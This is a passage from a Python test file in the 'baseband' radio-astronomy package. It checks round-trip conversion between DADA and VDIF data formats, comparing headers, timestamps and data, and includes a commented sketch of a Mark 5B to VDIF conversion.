data = self.get_vdif_data(dada_data)
assert abs(header.time - ddh.time) < 2. * u.ns
vdif_file = str(tmpdir.join('converted_dada.vdif'))
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - header.time) < 2. * u.ns
            # Write all data in a single frameset, made of two frames.
fw.write(data)
assert (fw.tell(unit='time') - stop_time) < 2. * u.ns
assert fw.offset == offset1
with vdif.open(vdif_file, 'rs') as fv:
assert abs(fv.header0.time - ddh.time) < 2. * u.ns
dv = fv.read()
assert fv.offset == offset1
assert np.abs(fv.tell(unit='time') - stop_time) < 2.*u.ns
vh = fv.header0
vnthread = fv.sample_shape.nthread
assert np.allclose(dv, data)
# Convert VDIF file back to DADA.
dada_file = str(tmpdir.join('reconverted.dada'))
dv_data = self.get_dada_data(dv)
assert np.allclose(dv_data, dada_data)
with dada.open(dada_file, 'ws', sample_rate=vh.sample_rate,
time=vh.time, npol=vnthread, bps=vh.bps,
payload_nbytes=vh.payload_nbytes*2, nchan=vh.nchan,
telescope=vh.station,
complex_data=vh['complex_data']) as fw:
new_header = fw.header0
fw.write(dv_data)
assert self.get_vdif_header(new_header) == vh
with dada.open(dada_file, 'rs') as fh:
header = fh.header0
new_dada_data = fh.read()
assert header == new_header
assert self.get_vdif_header(header) == vh
assert np.allclose(new_dada_data, dada_data)
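# Hedged sketch of the Mark 5B -> VDIF conversion pattern exercised above;
# the file names are hypothetical, and the sample rate and encoding must
# match the source data:
#
#     with mark5b.open('in.m5b', 'rs', sample_rate=32.*u.MHz, kday=56000,
#                      nchan=8, bps=2) as fr:
#         header = vdif.VDIFHeader.fromvalues(
#             edv=3, bps=fr.bps, nchan=1, station='WB',
#             time=fr.header0.time, sample_rate=32.*u.MHz,
#             complex_data=False)
#         data = fr.read(20000)
#     with vdif.open('out.vdif', 'ws', header0=header,
#                    nthread=data.shape[1]) as fw:
#         fw.write(data)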
|
mhvk/baseband
|
baseband/tests/test_conversion.py
|
Python
|
gpl-3.0
| 19,399
|